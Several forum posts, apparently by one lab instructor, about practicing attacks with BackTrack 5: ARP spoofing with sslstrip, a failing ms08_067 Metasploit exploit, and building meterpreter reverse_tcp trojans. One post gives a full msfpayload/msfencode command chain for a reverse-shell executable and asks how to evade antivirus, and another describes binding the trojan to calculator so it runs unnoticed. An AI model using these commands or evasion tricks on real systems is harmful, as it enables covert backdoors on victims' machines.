Hello, I am practicing my arpspoofing from backtrack 5 and had a question. I did all the ip forwarding and iptable stuff with nat. I want to run sslstrip so i first start with the arpspoof -i eth0 -t now here I put my host ip address because im running backtrack in a VM in bridged mode then I follow that with my home router ip. It runs, but when I try to bring up a browser on my host computer, it never finds a site, just times out. Is this because I should be targeting a separate computer not running this on the host computer? Same thing happens when i do it to a target computer elsewhere, browser just hangs there. As soon as I control-c out of arpspoof, websites come back like normal. Am I not putting in the right ip addresses? Isnt the first one after -t supposed to be the target computers ip address followed by the router ip address?

same here. Yes ive done the latest msfupdate but I have the most recent bt5, so Im curious

Thanks for the links. Glad to know, its not just my issue, lol. Now I thought shikata_ga_nai was polymorphic? curious why that wouldnt evade SE, unless like the article said, SE bases it off templates. I even did a trick where I uploaded the trojan, ran iexpress and made a self extracting executable by attaching it to calculator, so that when they closed out calc after use, it ran the meterpreter reverse_tcp. But it flagged that too and under the properties of the trojaned calc its even  signed by microsoft,lol

thanks yall, yeah I messed it up. I purposely dont have it patched or firewall on because I do these things as labs when I teach Security + classes. Thanks for the input

Hello again. Ive been making some trojans with msfpayload and have been messing with msfencode. The trojan has worked great dropping the meterpreter shell, however, for the life of me I cannot get it past microsoft security essential antivirus. No matter what I do, it flags it. My code is this:
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.146.139 lport=4442 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > chucknorris.exe and I usually run an apache server and connect to it from the xp machine and download the trojan, or I do shared folders in VM. Any tricks yall know to bypass security essentials? I would think two counts of 10 a piece and shikata_ga_nai would do the trick, but alas it does not.

never mind, I am a moron today. I messed up the rhost and the lhost, had them reversed.

Hello yall, I am new here to the forums and I have a quick question preceded by a little background. I am CEH certified and I do teach for a tech boot camp company, so I have some background in this. I set up my labs in virtual box as backtrack 5 and win xp service pack 2. Now when I first started learning metasploit I started with what everyone seems to start with, the old ms08_067_netapi one. This used to work fine back in backtrack 4 and I would pop the xp box everytime. Now I get error, connection refused by remote host then it lists my backtrack ip with a port number of 445. Says exploit completed but no session was created. Does this exploit no longer work in backtrack 5? I know the meterpreter session and reverse tcp is good to go because I just create the trojan now using msfpayload and do it that way. I noticed that armitage doesnt work for me anymore, no exploits work. It runs but doesnt do any exploits as in never gives me the attack menu after I scan for exploits by vulnerability. Just curious if anyone else is having this problem, thanks